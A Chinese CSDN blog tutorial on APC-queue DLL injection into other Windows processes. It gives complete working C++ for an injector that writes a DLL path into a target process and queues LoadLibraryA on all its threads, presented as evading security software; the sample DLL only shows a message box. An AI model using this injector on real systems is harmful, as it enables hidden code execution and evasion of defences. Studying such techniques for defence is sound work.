安全之路 —— 利用APC队列实现跨进程注入

最新推荐文章于 2024-07-10 01:01:34 发布
最新推荐文章于 2024-07-10 01:01:34 发布
阅读量813 收藏 3
点赞数
分类专栏: c/c++ Windows编程 文章标签: C/C++ Windows编程 APC注入 APC队列 线程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/peterz1997/article/details/88771801
版权

简介

在之前的文章中笔者曾经为大家介绍过使用CreateRemoteThread函数来实现远程线程注入(链接),毫无疑问最经典的注入方式,但也因为如此,这种方式到今天已经几乎被所有安全软件所防御。所以今天笔者要介绍的是一种相对比较“另类”的方式,被称作**“APC注入”。APC(Asynchronous Procedure Call),全称为异步过程调用**,指的是函数在特定线程中被异步执行。简单地说,在Windows操作系统中,每一个进程的每一个线程都有自己的APC队列,可以使用QueueUserAPC函数把一个APC函数压入APC队列中。当处于用户模式的APC被压入到线程APC队列后,线程并不会立刻执行压入的APC函数,而是要等到线程处于可通知状态才会执行,也就是说,只有当一个线程内部调用WaitForSingleObject, WaitForMultiObjects, SleepEx等函数将自己处于挂起状态时,才会执行APC队列函数,执行顺序与普通队列相同,先进先出(FIFO),在整个执行过程中,线程并无任何异常举动,不容易被察觉,但缺点是对于单线程程序一般不存在挂起状态,所以APC注入对于这类程序没有明显效果。

代码样例

  • DLL程序代码

//
// FileName : HelloWorldDll.cpp
// Creator : PeterZheng
// Date : 2018/11/02 11:10
// Comment : HelloWorld Test DLL ^_^
//


#include <iostream>
#include <Windows.h>

using namespace std;

BOOL WINAPI DllMain(
	_In_ HINSTANCE hinstDLL,
	_In_ DWORD     fdwReason,
	_In_ LPVOID    lpvReserved
)
{
	switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		MessageBox(NULL, "HelloWorld", "Tips", MB_OK);
		break;
	case DLL_PROCESS_DETACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
		break;
	}
	return TRUE;
}
  • 注入程序代码

//
// FileName : APCInject.cpp
// Creator : PeterZheng
// Date : 2018/12/17 16:27
// Comment : APC Injector
//


#pragma once

#include <cstdio>
#include <cstdlib>
#include <iostream>
#include <strsafe.h>
#include <Windows.h>
#include <TlHelp32.h>

using namespace std;

// 根据进程名字获取进程Id
BOOL GetProcessIdByName(CHAR *szProcessName, DWORD& dwPid)
{
	HANDLE hSnapProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapProcess == NULL)
	{
		printf("[*] Create Process Snap Error!\n");
		return FALSE;
	}
	PROCESSENTRY32 pe32 = { 0 };
	RtlZeroMemory(&pe32, sizeof(pe32));
	pe32.dwSize = sizeof(pe32);
	BOOL bRet = Process32First(hSnapProcess, &pe32);
	while (bRet)
	{
		if (_stricmp(pe32.szExeFile, szProcessName) == 0)
		{
			dwPid = pe32.th32ProcessID;
			return TRUE;
		}
		bRet = Process32Next(hSnapProcess, &pe32);
	}
	return FALSE;
}

// 获取对应进程Id的所有线程Id
BOOL GetAllThreadIdByProcessId(DWORD dwPid, DWORD** ppThreadIdList, LPDWORD pThreadIdListLength)
{
	DWORD dwThreadIdListLength = 0;
	DWORD dwThreadIdListMaxCount = 2000;
	LPDWORD pThreadIdList = NULL;
	pThreadIdList = (LPDWORD)VirtualAlloc(NULL, dwThreadIdListMaxCount * sizeof(DWORD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (pThreadIdList == NULL)
	{
		printf("[*] Create Thread Id Space Error!\n");
		return FALSE;
	}
	RtlZeroMemory(pThreadIdList, dwThreadIdListMaxCount * sizeof(DWORD));
	THREADENTRY32 te32 = { 0 };
	RtlZeroMemory(&te32, sizeof(te32));
	te32.dwSize = sizeof(te32);
	HANDLE hThreadSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
	if (hThreadSnapshot == NULL)
	{
		printf("[*] Create Thread Snap Error!\n");
		return FALSE;
	}
	BOOL bRet = Thread32First(hThreadSnapshot, &te32);
	while (bRet)
	{
		if (te32.th32OwnerProcessID == dwPid)
		{
			if (dwThreadIdListLength >= dwThreadIdListMaxCount)
			{
				break;
			}
			pThreadIdList[dwThreadIdListLength++] = te32.th32ThreadID;
		}
		bRet = Thread32Next(hThreadSnapshot, &te32);
	}
	*pThreadIdListLength = dwThreadIdListLength;
	*ppThreadIdList = pThreadIdList;
	return TRUE;
}

// 主函数
int main(int argc, char* argv[])
{
	if (argc != 3)
	{
		printf("[*] Format Error!  \nYou Should FOLLOW THIS FORMAT: <APCInject EXENAME DLLNAME> \n");
		return 0;
	}
	LPSTR szExeName = (LPSTR)VirtualAlloc(NULL, 100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	LPSTR szDllPath = (LPSTR)VirtualAlloc(NULL, 100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	RtlZeroMemory(szExeName, 100);
	RtlZeroMemory(szDllPath, 100);
	StringCchCopy(szExeName, 100, argv[1]);
	StringCchCopy(szDllPath, 100, argv[2]);
	DWORD dwPid = 0;
	BOOL bRet = GetProcessIdByName(szExeName, dwPid);
	if (!bRet)
	{
		printf("[*] Get Process Id Error!\n");
		return 0;
	}
	LPDWORD pThreadIdList = NULL;
	DWORD dwThreadIdListLength = 0;
	bRet = GetAllThreadIdByProcessId(dwPid, &pThreadIdList, &dwThreadIdListLength);
	if (!bRet)
	{
		printf("[*] Get All Thread Id Error!\n");
		return 0;
	}
	// 打开进程
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
	if (hProcess == NULL)
	{
		printf("[*] Open Process Error!\n");
		return 0;
	}
	DWORD dwDllPathLen = strlen(szDllPath) + 1;
	// 申请目标进程空间,用于存储DLL路径
	LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (lpBaseAddress == NULL)
	{
		printf("[*] VirtualAllocEx Error!\n");
		return 0;
	}
	SIZE_T dwWriten = 0;
	// 把DLL路径字符串写入目标进程
	WriteProcessMemory(hProcess, lpBaseAddress, szDllPath, dwDllPathLen, &dwWriten);
	if (dwWriten != dwDllPathLen)
	{
		printf("[*] Write Process Memory Error!\n");
		return 0;
	}
	LPVOID pLoadLibraryFunc = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (pLoadLibraryFunc == NULL)
	{
		printf("[*] Get Func Address Error!\n");
		return 0;
	}
	HANDLE hThread = NULL;
	// 倒序插入线程APC,可避免出现在插入时进程崩溃的现象
	for (int i = dwThreadIdListLength - 1; i >= 0; i--)
	{
		HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadIdList[i]);
		if (hThread)
		{
			QueueUserAPC((PAPCFUNC)pLoadLibraryFunc, hThread, (ULONG_PTR)lpBaseAddress);
			CloseHandle(hThread);
			hThread = NULL;
		}
	}

	// DLL路径分割,方便输出
	LPCSTR szPathSign = "\\";
	LPSTR p = NULL;
	LPSTR next_token = NULL;
	p = strtok_s(szDllPath, szPathSign, &next_token);
	while (p)
	{
		StringCchCopy(szDllPath, 100, p);
		p = strtok_s(NULL, szPathSign, &next_token);
	}
	printf("[*] APC Inject Info [%s ==> %s] Success\n", szDllPath, szExeName);

	if (hProcess)
	{
		CloseHandle(hProcess);
		hProcess = NULL;
	}
	if (pThreadIdList)
	{
		VirtualFree(pThreadIdList, 0, MEM_RELEASE);
		pThreadIdList = NULL;
	}
	VirtualFree(szDllPath, 0, MEM_RELEASE);
	VirtualFree(szExeName, 0, MEM_RELEASE);
	ExitProcess(0);
	return 0;
}

运行截图

APC注入运行截图

参考资料

  1. 《Windows黑客编程技术详解》【甘迪文 著】
雨者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入APC注入
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入APC注入,案例包括键盘钩子、计算器远线程注入实现APC注入等,希望对您有所帮助。
Windows APC机制 & 可警告alertable的线程等待状态
机器学习
07-28 3016
摘要:Windows APC的全称为(asynchronous procedure call)翻译为中文即“异步过程调用”。《Windows APC机制(一)》、《谈谈对APC的一点理解》、《线程的Alertable与User APC》主要阅读了这三篇文章,对APC有了个大概了解: 1) APCs允许用户程序和系统元件在一个进程的地址空间内某个线程的上下文中执行代码。 2) I/O管理器使用A...
通过APC实现Dll注入——绕过Sysmon监控
weixin_34414196的博客
09-18 920
本文讲的是通过APC实现Dll注入——绕过Sysmon监控, 0x00 前言 要对指定进程进行远程注入,通常使用Windows提供的API CreateRemoteThread创建一个远程线程,进而注入dll或是执行shellcode Sysmon可用来监控和记录系统活动,可记录CreateRemoteThread操作 注入的方法不只有CreateRe...
向其他进程注入代码的三种方法_不用编写独立的DLL,而是直接复制你的代码到远程进程.zip
04-04
dllinject向其他进程注入代码的三种方法_进程注入的三种方法_不用编写一个独立的DLL而是直接复制你的代码到远程进程
免杀笔记 ---> APC注入
最新发布
huohaowen的博客
07-10 678
除了我们前面讲的DLL注入,还有一个APC注入的东西也是很重要的!!::确实很重要,相应的,在跟新完今天的代码之后,我也会对应的进行Github上工具的更新!!
注入(一):APC注入
零点起步
04-14 1426
APC注入:Asynchronous Procedure Call,异步过程调用,每个线程都有一个APC队列,在用户模式下,当线程调用SleepEx,WaitForSingleObjectEx等进入"Alterable Wait Status.  此时系统会遍历APC队列,先进先出地处理其中函数(QueueUserAPC)  优:比较隐蔽 缺:实现的条件苛刻 //负责注入的exe #incl
向其他进程注入代码的三种方法
小发猫
06-03 1904
向其他进程注入代码的三种方法Three Ways to Inject Your Code into Another Process作者:袁晓辉 译    文章来源:本站原创    点击数:35    更新时间:2005-5-23向其他进程注入代码的三种方法    本文章翻译自Robet Kuster的Three Ways to Inject Your Code into Another Proce
另类傀儡进程——利用内存映射文件与APC注入实现
qq_41861225的博客
02-25 900
**前言:**近日分析某游戏辅助软件时,发现其使用了傀儡进程的方式,本以为是常见的傀儡进程技术实现,但在分析时并未发现其调用常规函数实现,而是使用了一些内存映射的API,所以仔细分析后发现其傀儡进程实现技术有所不同,故学习整理。 一、 傀儡进程 傀儡进程是指将目标进程的映射文件替换为指定的映射文件,替换后的进程称之为傀儡进程。 一般来说傀儡进程的创建流程分别为以下几点: 以挂起的方式进行创建...
DLL注入的多种方式
flowwaterdog的博客
05-09 2848
DLL注入的多种方式 注册表注入Windows NT/2000/XP/2003操作系统中,当需要加载user32.dll的程序启动时,user32.dll会加载注册表键HLM\Software\Microsoft\WindowsNT\CurrentVersion\Windows\AppInit_DIls下面列出的所有模块。 因此,可以将要注入的模块所在的路径写到AppInit_DIls 键下,待游戏进程启动并将外挂模块带人之后,再删除AppInit_DIls 键的值以清除痕迹,其核心函数如下: //定义
APC年龄时期队列模型大论文介绍.pdf
06-14
APC年龄时期队列模型大论文介绍.pdf
024-1进程调用CALL+进程注入代码.flv
06-13
//官方网站:www.feiyuol.com //郁金香灬老师 //QQ 150330575 //个人网站:www.yjxsoft.com 进程调用CALL 进程调用带多个的参数CALL // myInject_dll.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include #include"RWA.h" //PVOID 进程分配内存(WORD nSize ); //1、获取进程句柄 //2、读写 分配内存 创建线程 //3、进程分配内存 void mycall() { PVOID p1=进程分配内存(1000); printf("分配的内存地址=%p\n",p1); printf("按回车键 释放内存\n"); getchar(); 进程释放内存(p1,1000); printf("已经 释放内存\n"); } LPTHREAD_START_ROUTINE a; BOOL 进程调用CALL(PVOID pcall地址,PVOID plst参数 ); //LoadLibraryA(dll名字指针) //MessageBeep(1) void Test远程调用MessageBeep() { 进程调用CALL(MessageBeep,(PVOID)0x12768); } //注入my022MFC.dll到目标进程 void Test3() { char szDllName[]="my022MFC.dll"; //全路径 // char szDllName[]="C:\\Users\\yjxsoft\\Documents\\visual studio 2010\\Projects\\my022\\Debug\\my022MFC.dll"; PVOID p1=进程分配内存(1000); printf("分配的内存地址=%p\n",p1); WN((DWORD)p1,szDllName,sizeof(szDllName));//WriteProcessMemory /*进程调用CALL(LoadLibraryA,(PVOID)szDllName);*/ 进程调用CALL(LoadLibraryA,(PVOID)p1); } void Test4() { // char szDllName[]="my022MFC.dll"; //全路径 char szDllName[]="E:\\1905\\代码\\my022-24\\Debug\\my022MFC.dll"; PVOID p1=进程分配内存(1000); printf("分配的内存地址=%p\n",p1); WN((DWORD)p1,szDllName,sizeof(szDllName));//WriteProcessMemory /*进程调用CALL(LoadLibraryA,(PVOID)szDllName);*/ 进程调用CALL(LoadLibraryA,(PVOID)p1); } int _tmain(int argc, _TCHAR* argv[]) { //mycall(); Test3(); Test4(); return 0; } //作业 //1、练习进程注入DLL //2、进程分配的内存内存 使用完后 用VirtualFreeEx释放掉 //3、进程句柄使用完后用CloseHandle释放句柄资源
c++ DLL注入,win32 api版,win10测试通过
07-21
用于远程注入exe,并截取wndproc窗口消息函数,以将两个不同窗口的位置进行绑定。 使用g++编译并测试通过,注意:将生成的inject.exe添加到杀软白名单。 注入进程及窗口在inject.cpp及size.cpp中修改。 编译请参看make.bat
深入Windows APC
pythonxxoo的博客
02-05 654
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475   本篇原文为 寂静的羽夏(wingsummer) 中文翻译,非机翻,著作权归原作者 Rbmm 和 Dennis A. Babkin 所有。   由于原文十分冗长,也十分干货,采用机翻辅助,人工阅读比对修改的方式进行,如有翻译不得当的地方,欢迎批评指正。翻译不易,如有闲钱,欢迎
内核篇-----APC队列介绍
qq_45806710的博客
02-08 1751
APC队列 kd> dt _KAPC nt!_KAPC +0x000 Type : Int2B //APC类型为0x12 +0x002 Size : Int2B //大小为0x30 +0x004 Spare0 : Uint4B +0x008 Thread : Ptr32 _KTHREAD//目标进程 +0x00c ApcListEntry : _LIST_ENTRY /
备用APC队列
qq_41490873的博客
06-09 176
备用APC的意义 当线程处于挂靠状态时,ApcState里面存的是挂靠的进程APC SavedApcState里面存的是自己父进程APC
2.备用APC队列
My classmates
10-23 343
如果想让线程做什么事情,就给它的APC队列里面挂一个APC。 kd&amp;gt; dt _kthread nt!_KTHREAD ... +0x034 ApcState : _KAPC_STATE//APC ... +0x138 ApcStatePointer : [2] Ptr32 _KAPC_STATE//APC指针 ... +0x14c SavedApcState : _K...
windows核心编程-线程可警告状态以及APC队列
qq_22423659的博客
12-01 1305
一、线程可警告状态的真实含义 1、通过另一些方法让线程"暂停"(非SuspendThread方法,比如SleepEx,wait函数族等),并可以进入一种称之为 Alterable的状态(可警告状态) 2、这种状态本质上其实是高速系统调度程序:当前现成的函数调用栈以及对应的寄存器状态可以直接被用来调用 别的一些函数,一般这种函数都被称为异步函数 3、通常系统会用此线程环境(理解为函数调用器
sas实现apc年龄时期队列
07-24
### 回答1: SAS(统计分析系统)是一种广泛应用于数据分析和统计建模的软件工具。实现APC(age-period-cohort)年龄时期队列涉及对数据的整理、分析和建模。 APC年龄时期队列分析是一种研究人口或事件在不同年龄、不同时期和不同历史时期的影响的方法。在SAS中,可以使用多种函数和过程来实现这一方法。 首先,需要对所需的数据进行整理和准备。将数据按年龄、时期和队列进行分类,并保证每个分类中的数据是完整和准确的。这可以通过SAS的数据整理和处理函数来实现,例如DATA步骤和SQL查询。 接下来,使用SAS中的统计分析过程来计算和分析APC年龄时期队列。可以使用PROC REG和PROC GLM来进行回归分析,查看年龄、时期和队列对所研究事件的影响。也可以使用PROC GENMOD来进行广义线性模型分析,例如对二项式数据的分析。 在分析过程中,还可以使用SAS的可视化工具来展示结果和趋势。例如,可以使用PROC SGPLOT生成图表和图形,清晰地展示年龄、时期和队列的关系和变化趋势。 最后,根据对APC年龄时期队列的分析结果,可以对特定问题或现象作出解释和预测。这将有助于了解人口或事件在不同年龄、时期和队列中的变化和发展规律,从而提供决策和干预的依据。 总而言之,通过SAS软件工具的数据整理、分析和建模功能,可以实现APC年龄时期队列的研究和分析。这将有助于深入了解和解释人口或事件在不同年龄、时期和队列中的变化和影响。 ### 回答2: SAS(统计分析系统)是一种功能强大的统计分析软件,可以用于实现多种统计分析方法和模型。要实现APC(年龄、时期、队列)模型,首先需要了解APC模型的基本概念和原理。 在APC模型中,年龄、时期和队列是指个体或群体的三个重要维度。年龄表示个体或群体的年龄水平,时期表示观察或研究的时间点或时间期间,队列则表示在特定时期出生的个体或群体。这三个维度综合起来,可以帮助我们分析和预测某种现象或变量在不同年龄、不同时期和不同队列中的变化。 为了使用SAS实现APC模型,可以遵循以下步骤: 1. 数据准备:将需要分析的数据导入SAS软件中,并确保数据格式正确,包括年龄、时期和队列等相关变量。 2. 数据探索和描述性分析:使用SAS的统计分析功能,对数据进行探索性分析,如描述统计、频率分析、数据可视化等,以了解数据的分布和特征。 3. APC模型建立:在SAS中,可以使用各种统计模型来建立APC模型,如线性回归模型、广义线性模型、混合效应模型等。根据具体研究目的和数据特点,选择适合的模型进行建模。 4. 模型拟合和评估:使用SAS的模型拟合功能,对建立的APC模型进行拟合,并评估模型的拟合效果和预测能力,如残差分析、拟合优度检验等。 5. 结果解释和报告:根据模型结果,解释模型中各个变量的影响,如年龄效应、时期效应、队列效应等,并根据需要生成相应的报告或图表。 总之,通过使用SAS统计分析软件,可以比较方便地实现APC年龄时期队列模型,从而深入分析和预测不同维度对某种现象的影响。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值